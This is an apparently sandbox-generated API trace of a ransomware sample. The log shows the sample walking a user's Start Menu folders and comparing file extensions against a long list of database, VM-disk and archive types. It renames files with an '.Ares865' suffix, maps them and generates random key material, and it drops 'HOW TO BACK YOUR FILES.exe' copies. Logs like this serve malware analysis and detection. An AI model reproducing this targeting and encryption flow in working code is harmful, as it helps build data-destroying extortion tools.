[0092.584] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0092.584] lstrlenW (lpString="usr") returned 3 [0092.584] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0092.584] lstrlenW (lpString="v12") returned 3 [0092.584] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0092.584] lstrlenW (lpString="vis") returned 3 [0092.584] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0092.584] lstrlenW (lpString="vpd") returned 3 [0092.584] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0092.584] lstrlenW (lpString="vvv") returned 3 [0092.584] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0092.584] lstrlenW (lpString="wdb") returned 3 [0092.584] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0092.584] lstrlenW (lpString="wmdb") returned 4 [0092.584] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0092.584] lstrlenW (lpString="wrk") returned 3 [0092.584] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0092.584] lstrlenW (lpString="xdb") returned 3 [0092.584] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0092.584] lstrlenW (lpString="xld") returned 3 [0092.584] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0092.585] lstrlenW (lpString="xmlff") returned 5 [0092.585] lstrcmpiW (lpString1="r.lnk", lpString2="xmlff") returned -1 [0092.585] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk.Ares865") returned 90 [0092.585] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\windows explorer.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\windows explorer.lnk.ares865"), dwFlags=0x1) returned 1 [0092.587] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\windows explorer.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.587] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1228) returned 1 [0092.587] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.587] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.587] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.587] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.588] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.588] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.588] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x15c [0092.590] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x190000 [0092.593] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.594] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.594] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.595] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.595] CloseHandle (hObject=0x15c) returned 1 [0092.595] CloseHandle (hObject=0x118) returned 1 [0092.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.595] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0092.595] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0092.595] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a30 [0092.595] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools" [0092.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0092.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0092.595] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools") returned 74 [0092.595] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools" [0092.595] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0092.596] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\system tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0092.596] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0092.596] GetLastError () returned 0x0 [0092.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0092.596] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0092.596] CloseHandle (hObject=0x120) returned 1 [0092.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0092.597] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0092.597] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d111ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d111ec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0092.597] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.597] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0092.597] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0092.597] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d111ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d111ec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.597] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.597] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0092.597] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0092.597] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0092.597] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e0d0d6f, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="computer.lnk", cAlternateFileName="")) returned 1 [0092.597] lstrcmpiW (lpString1="computer.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.597] lstrcmpiW (lpString1="computer.lnk", lpString2="aoldtz.exe") returned 1 [0092.597] lstrcmpiW (lpString1="computer.lnk", lpString2=".") returned 1 [0092.597] lstrcmpiW (lpString1="computer.lnk", lpString2="..") returned 1 [0092.597] lstrcmpiW (lpString1="computer.lnk", lpString2="windows") returned -1 [0092.597] lstrcmpiW (lpString1="computer.lnk", lpString2="bootmgr") returned 1 [0092.597] lstrcmpiW (lpString1="computer.lnk", lpString2="temp") returned -1 [0092.597] lstrcmpiW (lpString1="computer.lnk", lpString2="pagefile.sys") returned -1 [0092.597] lstrcmpiW (lpString1="computer.lnk", lpString2="boot") returned 1 [0092.597] lstrcmpiW (lpString1="computer.lnk", lpString2="ids.txt") returned -1 [0092.597] lstrcmpiW (lpString1="computer.lnk", lpString2="ntuser.dat") returned -1 [0092.597] lstrcmpiW (lpString1="computer.lnk", lpString2="perflogs") returned -1 [0092.597] lstrcmpiW (lpString1="computer.lnk", lpString2="MSBuild") returned -1 [0092.597] lstrlenW (lpString="computer.lnk") returned 12 [0092.597] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\*") returned 76 [0092.597] lstrcpyW (in: lpString1=0x2cce496, lpString2="computer.lnk" | out: lpString1="computer.lnk") returned="computer.lnk" [0092.597] lstrlenW (lpString="computer.lnk") returned 12 [0092.598] lstrlenW (lpString="Ares865") returned 7 [0092.598] lstrcmpiW (lpString1="ter.lnk", lpString2="Ares865") returned 1 [0092.598] lstrlenW (lpString=".dll") returned 4 [0092.598] lstrcmpiW (lpString1="computer.lnk", lpString2=".dll") returned 1 [0092.598] lstrlenW (lpString=".lnk") returned 4 [0092.598] lstrcmpiW (lpString1="computer.lnk", lpString2=".lnk") returned 1 [0092.598] lstrlenW (lpString=".ini") returned 4 [0092.598] lstrcmpiW (lpString1="computer.lnk", lpString2=".ini") returned 1 [0092.598] lstrlenW (lpString=".sys") returned 4 [0092.598] lstrcmpiW (lpString1="computer.lnk", lpString2=".sys") returned 1 [0092.598] lstrlenW (lpString="computer.lnk") returned 12 [0092.598] lstrlenW (lpString="bak") returned 3 [0092.598] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0092.598] lstrlenW (lpString="ba_") returned 3 [0092.598] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0092.598] lstrlenW (lpString="dbb") returned 3 [0092.598] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0092.598] lstrlenW (lpString="vmdk") returned 4 [0092.598] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0092.598] lstrlenW (lpString="rar") returned 3 [0092.598] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0092.598] lstrlenW (lpString="zip") returned 3 [0092.598] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0092.598] lstrlenW (lpString="tgz") returned 3 [0092.598] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0092.598] lstrlenW (lpString="vbox") returned 4 [0092.598] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0092.598] lstrlenW (lpString="vdi") returned 3 [0092.598] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0092.598] lstrlenW (lpString="vhd") returned 3 [0092.598] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0092.598] lstrlenW (lpString="vhdx") returned 4 [0092.598] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0092.598] lstrlenW (lpString="avhd") returned 4 [0092.598] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0092.598] lstrlenW (lpString="db") returned 2 [0092.599] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.599] lstrlenW (lpString="db2") returned 3 [0092.599] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0092.599] lstrlenW (lpString="db3") returned 3 [0092.599] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0092.599] lstrlenW (lpString="dbf") returned 3 [0092.599] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0092.599] lstrlenW (lpString="mdf") returned 3 [0092.599] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0092.599] lstrlenW (lpString="mdb") returned 3 [0092.599] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0092.599] lstrlenW (lpString="sql") returned 3 [0092.599] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0092.599] lstrlenW (lpString="sqlite") returned 6 [0092.599] lstrcmpiW (lpString1="er.lnk", lpString2="sqlite") returned -1 [0092.599] lstrlenW (lpString="sqlite3") returned 7 [0092.599] lstrcmpiW (lpString1="ter.lnk", lpString2="sqlite3") returned 1 [0092.599] lstrlenW (lpString="sqlitedb") returned 8 [0092.599] lstrcmpiW (lpString1="uter.lnk", lpString2="sqlitedb") returned 1 [0092.599] lstrlenW (lpString="xml") returned 3 [0092.599] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0092.599] lstrlenW (lpString="$er") returned 3 [0092.599] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0092.599] lstrlenW (lpString="4dd") returned 3 [0092.599] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0092.599] lstrlenW (lpString="4dl") returned 3 [0092.599] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0092.599] lstrlenW (lpString="^^^") returned 3 [0092.599] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0092.599] lstrlenW (lpString="abs") returned 3 [0092.599] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0092.599] lstrlenW (lpString="abx") returned 3 [0092.599] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0092.599] lstrlenW (lpString="accdb") returned 5 [0092.599] lstrcmpiW (lpString1="r.lnk", lpString2="accdb") returned 1 [0092.599] lstrlenW (lpString="accdc") returned 5 [0092.600] lstrcmpiW (lpString1="r.lnk", lpString2="accdc") returned 1 [0092.600] lstrlenW (lpString="accde") returned 5 [0092.600] lstrcmpiW (lpString1="r.lnk", lpString2="accde") returned 1 [0092.600] lstrlenW (lpString="accdr") returned 5 [0092.600] lstrcmpiW (lpString1="r.lnk", lpString2="accdr") returned 1 [0092.600] lstrlenW (lpString="accdt") returned 5 [0092.600] lstrcmpiW (lpString1="r.lnk", lpString2="accdt") returned 1 [0092.600] lstrlenW (lpString="accdw") returned 5 [0092.600] lstrcmpiW (lpString1="r.lnk", lpString2="accdw") returned 1 [0092.600] lstrlenW (lpString="accft") returned 5 [0092.600] lstrcmpiW (lpString1="r.lnk", lpString2="accft") returned 1 [0092.600] lstrlenW (lpString="adb") returned 3 [0092.600] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.600] lstrlenW (lpString="adb") returned 3 [0092.600] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.600] lstrlenW (lpString="ade") returned 3 [0092.600] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0092.600] lstrlenW (lpString="adf") returned 3 [0092.600] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0092.600] lstrlenW (lpString="adn") returned 3 [0092.600] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0092.600] lstrlenW (lpString="adp") returned 3 [0092.600] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0092.600] lstrlenW (lpString="alf") returned 3 [0092.600] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0092.600] lstrlenW (lpString="ask") returned 3 [0092.600] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0092.600] lstrlenW (lpString="btr") returned 3 [0092.600] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0092.600] lstrlenW (lpString="cat") returned 3 [0092.600] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0092.600] lstrlenW (lpString="cdb") returned 3 [0092.600] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0092.600] lstrlenW (lpString="ckp") returned 3 [0092.600] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0092.600] lstrlenW (lpString="cma") returned 3 [0092.601] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0092.601] lstrlenW (lpString="cpd") returned 3 [0092.601] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0092.601] lstrlenW (lpString="dacpac") returned 6 [0092.601] lstrcmpiW (lpString1="er.lnk", lpString2="dacpac") returned 1 [0092.601] lstrlenW (lpString="dad") returned 3 [0092.601] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0092.601] lstrlenW (lpString="dadiagrams") returned 10 [0092.601] lstrcmpiW (lpString1="mputer.lnk", lpString2="dadiagrams") returned 1 [0092.601] lstrlenW (lpString="daschema") returned 8 [0092.601] lstrcmpiW (lpString1="uter.lnk", lpString2="daschema") returned 1 [0092.601] lstrlenW (lpString="db-journal") returned 10 [0092.601] lstrcmpiW (lpString1="mputer.lnk", lpString2="db-journal") returned 1 [0092.601] lstrlenW (lpString="db-shm") returned 6 [0092.601] lstrcmpiW (lpString1="er.lnk", lpString2="db-shm") returned 1 [0092.601] lstrlenW (lpString="db-wal") returned 6 [0092.601] lstrcmpiW (lpString1="er.lnk", lpString2="db-wal") returned 1 [0092.601] lstrlenW (lpString="dbc") returned 3 [0092.601] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0092.601] lstrlenW (lpString="dbs") returned 3 [0092.601] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0092.601] lstrlenW (lpString="dbt") returned 3 [0092.601] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0092.601] lstrlenW (lpString="dbv") returned 3 [0092.601] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0092.601] lstrlenW (lpString="dbx") returned 3 [0092.601] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0092.601] lstrlenW (lpString="dcb") returned 3 [0092.601] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0092.601] lstrlenW (lpString="dct") returned 3 [0092.601] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0092.601] lstrlenW (lpString="dcx") returned 3 [0092.601] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0092.601] lstrlenW (lpString="ddl") returned 3 [0092.601] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0092.601] lstrlenW (lpString="dlis") returned 4 [0092.602] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0092.602] lstrlenW (lpString="dp1") returned 3 [0092.602] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0092.602] lstrlenW (lpString="dqy") returned 3 [0092.602] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0092.602] lstrlenW (lpString="dsk") returned 3 [0092.602] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0092.602] lstrlenW (lpString="dsn") returned 3 [0092.602] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0092.602] lstrlenW (lpString="dtsx") returned 4 [0092.602] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0092.602] lstrlenW (lpString="dxl") returned 3 [0092.602] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0092.602] lstrlenW (lpString="eco") returned 3 [0092.602] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0092.602] lstrlenW (lpString="ecx") returned 3 [0092.602] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0092.602] lstrlenW (lpString="edb") returned 3 [0092.602] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0092.602] lstrlenW (lpString="epim") returned 4 [0092.602] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0092.602] lstrlenW (lpString="fcd") returned 3 [0092.602] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0092.602] lstrlenW (lpString="fdb") returned 3 [0092.602] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0092.602] lstrlenW (lpString="fic") returned 3 [0092.602] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0092.602] lstrlenW (lpString="flexolibrary") returned 12 [0092.602] lstrlenW (lpString="fm5") returned 3 [0092.602] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0092.602] lstrlenW (lpString="fmp") returned 3 [0092.602] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0092.602] lstrlenW (lpString="fmp12") returned 5 [0092.602] lstrcmpiW (lpString1="r.lnk", lpString2="fmp12") returned 1 [0092.602] lstrlenW (lpString="fmpsl") returned 5 [0092.602] lstrcmpiW (lpString1="r.lnk", lpString2="fmpsl") returned 1 [0092.603] lstrlenW (lpString="fol") returned 3 [0092.603] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0092.603] lstrlenW (lpString="fp3") returned 3 [0092.603] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0092.603] lstrlenW (lpString="fp4") returned 3 [0092.603] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0092.603] lstrlenW (lpString="fp5") returned 3 [0092.603] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0092.603] lstrlenW (lpString="fp7") returned 3 [0092.603] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0092.603] lstrlenW (lpString="fpt") returned 3 [0092.603] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0092.603] lstrlenW (lpString="frm") returned 3 [0092.603] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0092.603] lstrlenW (lpString="gdb") returned 3 [0092.603] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.603] lstrlenW (lpString="gdb") returned 3 [0092.603] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.603] lstrlenW (lpString="grdb") returned 4 [0092.603] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0092.603] lstrlenW (lpString="gwi") returned 3 [0092.603] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0092.603] lstrlenW (lpString="hdb") returned 3 [0092.603] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0092.603] lstrlenW (lpString="his") returned 3 [0092.603] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0092.603] lstrlenW (lpString="ib") returned 2 [0092.603] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0092.603] lstrlenW (lpString="idb") returned 3 [0092.603] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0092.603] lstrlenW (lpString="ihx") returned 3 [0092.603] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0092.603] lstrlenW (lpString="itdb") returned 4 [0092.603] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0092.603] lstrlenW (lpString="itw") returned 3 [0092.603] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0092.604] lstrlenW (lpString="jet") returned 3 [0092.604] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0092.604] lstrlenW (lpString="jtx") returned 3 [0092.604] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0092.604] lstrlenW (lpString="kdb") returned 3 [0092.604] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0092.604] lstrlenW (lpString="kexi") returned 4 [0092.604] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0092.604] lstrlenW (lpString="kexic") returned 5 [0092.604] lstrcmpiW (lpString1="r.lnk", lpString2="kexic") returned 1 [0092.604] lstrlenW (lpString="kexis") returned 5 [0092.604] lstrcmpiW (lpString1="r.lnk", lpString2="kexis") returned 1 [0092.604] lstrlenW (lpString="lgc") returned 3 [0092.604] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0092.604] lstrlenW (lpString="lwx") returned 3 [0092.604] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0092.604] lstrlenW (lpString="maf") returned 3 [0092.604] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0092.604] lstrlenW (lpString="maq") returned 3 [0092.604] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0092.604] lstrlenW (lpString="mar") returned 3 [0092.604] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0092.604] lstrlenW (lpString="marshal") returned 7 [0092.604] lstrcmpiW (lpString1="ter.lnk", lpString2="marshal") returned 1 [0092.604] lstrlenW (lpString="mas") returned 3 [0092.604] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0092.604] lstrlenW (lpString="mav") returned 3 [0092.604] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0092.604] 